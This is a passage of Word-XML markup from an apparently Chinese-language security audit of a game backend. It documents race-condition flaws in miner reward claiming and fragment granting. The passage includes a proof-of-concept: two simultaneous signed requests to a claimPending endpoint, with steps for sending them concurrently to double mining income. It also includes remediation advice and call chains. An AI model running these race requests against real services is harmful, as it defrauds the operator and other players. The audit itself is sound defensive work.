          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>slotId = 1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>（当前无矿机，或用户整体无部署矿机更佳）；</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="694"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>签名参数（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>sign</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>timestamp</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>nonce</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">）按 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>SignAuthTestFilter</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 要求生成。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:b w:val="true"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>请求 A（并发发送）：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/api/miner/claimPending HTTP/1.1</w:t>
              <w:br/>
              <w:t>Host: &lt;target&gt;</w:t>
              <w:br/>
              <w:t>Authorization: Bearer &lt;有效Token&gt;</w:t>
              <w:br/>
              <w:t>Content-Type: application/json</w:t>
              <w:br/>
              <w:t>X-Sign: &lt;攻击者生成的合法签名A&gt;</w:t>
              <w:br/>
              <w:t>X-Timestamp: &lt;当前时间戳&gt;</w:t>
              <w:br/>
              <w:t>X-Nonce: &lt;随机nonce_A&gt;</w:t>
              <w:br/>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>{"slotId": 1, "recordId": &lt;R1&gt;}</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:b w:val="true"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>请求 B（与请求 A 同时发送）：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/api/miner/claimPending HTTP/1.1</w:t>
              <w:br/>
              <w:t>Host: &lt;target&gt;</w:t>
              <w:br/>
              <w:t>Authorization: Bearer &lt;有效Token&gt;</w:t>
              <w:br/>
              <w:t>Content-Type: application/json</w:t>
              <w:br/>
              <w:t>X-Sign: &lt;攻击者生成的合法签名B&gt;</w:t>
              <w:br/>
              <w:t>X-Timestamp: &lt;当前时间戳&gt;</w:t>
              <w:br/>
              <w:t>X-Nonce: &lt;随机nonce_B&gt;</w:t>
              <w:br/>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>{"slotId": 1, "recordId": &lt;R2&gt;}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695"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">登录目标账号，确认存在两条以上待领取 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>PendingMinerReward</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 记录，记录其 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>recordId</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>（R1, R2）；</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="696"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">确认目标坑位（如 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>slotId=1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>）当前无矿机，账户最好处于零矿机部署状态；</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="697"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">使用并发工具（如 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>curl</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 多线程、Python </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>asyncio</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>、Burp Suite Turbo Intruder 等）</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:b w:val="true"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>同时投递</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">请求 A 和请求 B，两者 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>slotId</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 相同但 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>recordId</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 不同；</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="698"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">观察两个请求均返回 HTTP 200 / </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>ApiResponse.success()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>；</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="699"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">查询该用户矿机列表，确认 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>slotId=1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 存在两条 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>inStorage=0</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 的矿机记录；</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="700"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">此后该用户在 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>slotId=1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 的算力为两台矿机之和，每个挖矿周期均获得翻倍收益，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>pushBalance</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 推送的余额亦基于翻倍算力。</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 同一坑位存在两台矿机，挖矿收益永久翻倍，直至人工修复数据。</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70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 + 合法请求签名）</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="702"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>权限级别：普通用户（无需任何特权）</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="703"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>额外前置：需持有 ≥ 2 条有效待领取矿机奖励记录</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修复建议方向（仅供参考）：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="704"/>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user_miner</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 表的 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>(user_id, slot_id)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 上添加唯一约束，依靠数据库层面兜底；</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="705"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>或将坑位占用校验改为加锁读（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>findByUserIdAndSlotIdAndInStorageForUpdate</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>），确保读取最新已提交数据而非历史快照。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>&gt; 📎 该 sink 另有 1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受影响调用链（2 条）</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="706"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>MinerController.java.claimPending → PendingMinerService.java.claim → PendingMinerReward.java.setStatus</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="707"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>MinerController.java.claimPending → PendingMinerService.java.claim → PendingMinerReward.java.setClaimTime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audit_m157_686_claimPending_ctrl-path17of19.md</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>audit_m157_695_claimPending_ctrl-path18of19.md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：MinerFragmentService.java#checkAndGrant</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:before="300" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
        <w:outlineLvl w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:name="heading_32" w:id="32"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:b w:val="true"/>
          <w:sz w:val="30"/>
        </w:rPr>
        <w:t>漏洞31：碎片重复领取 TOCTOU 竞态条件</w:t>
      </w:r>
      <w:bookmarkEnd w:id="32"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="708"/>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：碎片发放逻辑 TOCTOU 并发竞态导致同一碎片可被重复领取</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="709"/>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src/main/java/com/gameBack/mjservice/service/MinerFragmentService.java:checkAndGrant</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="710"/>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711"/>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12"/>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：普通已登录用户（满足任意碎片发放条件）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checkAndGrant</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 方法采用"先查询后写入"的非原子模式（read-check-write）：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="713"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:b w:val="true"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Check</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>userFragmentRepository.findByUserIdAndFragmentId(userId, fragmentId)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 查询是否已持有碎片；</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="714"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:b w:val="true"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Check</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>if (uf.getIsObtained() == null || uf.getIsObtained() == 0)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 判断是否已发放；</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="715"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:b w:val="true"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Write</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>userFragmentRepository.save(uf)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 执行 INSERT（id 为 null 时 JPA 走插入路径）。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">方法虽标注了 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>@Transactional</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>，但该注解仅保证单个事务内的原子性，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:b w:val="true"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>无法阻止两个并发事务都在对方提交前完成"读取"步骤</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="716"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>数据库隔离级别为 READ COMMITTED 时：T1、T2 均读到"不存在该记录" → 均通过条件判断 → 均执行 INSERT；</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="717"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
